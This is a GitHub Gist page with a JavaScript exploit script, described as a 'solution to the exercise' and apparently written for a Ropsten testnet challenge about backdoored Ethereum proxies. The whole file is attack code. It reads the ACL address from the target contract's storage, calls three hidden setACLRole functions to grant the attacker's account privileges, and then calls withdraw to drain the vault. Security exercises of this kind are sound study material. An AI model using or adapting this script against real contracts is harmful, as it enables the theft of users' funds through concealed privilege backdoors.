Last active
October 11, 2022 06:45
-
-
Save ripwu/d1c99c3de2215bbcb2a51c2f6fda8ca9 to your computer and use it in GitHub Desktop.
solution to the exercise
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// https://medium.com/nomic-labs-blog/malicious-backdoors-in-ethereum-proxies-62629adf3357 | |
const MyAccountAddr = '0xbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb'; | |
const MyAccountKey = '0xbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb'; | |
const RopstenInfuraNode = 'https://ropsten.infura.io/v3/bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb'; | |
const RopstenNetworkId = '3'; | |
const Web3 = require('web3'); | |
const web3 = new Web3(RopstenInfuraNode); | |
async function getAddressAtStorage(contract, slot) { | |
var address = await web3.eth.getStorageAt(contract, slot); | |
address = `0x${address.slice(-40)}`; | |
return address; | |
} | |
async function sendTx(tx, value, to, gasLimit = undefined) { | |
const gas = gasLimit || await tx.estimateGas({from: MyAccountAddr}); | |
const gasPrice = await web3.eth.getGasPrice(); | |
const nonce = await web3.eth.getTransactionCount(MyAccountAddr); | |
const options = { | |
to, | |
data: tx.encodeABI(), | |
value, | |
gas: gas * 20, | |
gasPrice: gasPrice * 10, | |
nonce, | |
chainId: RopstenNetworkId | |
}; | |
const signedTx = await web3.eth.accounts.signTransaction(options, MyAccountKey); | |
await web3.eth.sendSignedTransaction(signedTx.rawTransaction); | |
} | |
async function main() { | |
const targetContract = '0xB97DD0102bB67f81d25D686C661d7F0AED62E344'; | |
// 0. | |
const passRequire1 = 0.001 * (10 ** 18); | |
const passRequire2 = 0.01 * (10 ** 18); | |
const balance = await web3.eth.getBalance(targetContract); | |
const balanceMy = await web3.eth.getBalance(MyAccountAddr); | |
const value = Number(balance) + passRequire2; | |
console.log("balance, balaceMy, value", balance, balanceMy, value); | |
if ((Number(balance) < passRequire1) || (Number(balanceMy) < value)) { | |
return; | |
} | |
// 1. | |
const acl = await getAddressAtStorage(targetContract, 0); | |
const ACLContractABI = require('../build/contracts/ACL.json').abi; | |
const aclContract = new web3.eth.Contract(ACLContractABI, acl); | |
// 2. | |
console.log("sendTx setACLRole7123909213907581092"); | |
const txSetACLRole7123909213907581092 = aclContract.methods.setACLRole7123909213907581092(MyAccountAddr); | |
await sendTx(txSetACLRole7123909213907581092, 0, acl); | |
console.log("sendTx setACLRole8972381298910001230"); | |
const txSetACLRole8972381298910001230 = aclContract.methods.setACLRole8972381298910001230(MyAccountAddr); | |
await sendTx(txSetACLRole8972381298910001230, 0, acl); | |
console.log("sendTx setACLRole5999294130779334338"); | |
const txSetACLRole5999294130779334338 = aclContract.methods.setACLRole5999294130779334338(MyAccountAddr); | |
await sendTx(txSetACLRole5999294130779334338, 0, acl); | |
// 3. | |
const VaultContractABI = require('../build/contracts/Vault.json').abi; | |
const vaultContract = new web3.eth.Contract(VaultContractABI, targetContract); | |
console.log("sendTx withdraw"); | |
const txWithdraw = vaultContract.methods.withdraw(); | |
await sendTx(txWithdraw, value, targetContract, 100000); | |
} | |
main(); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment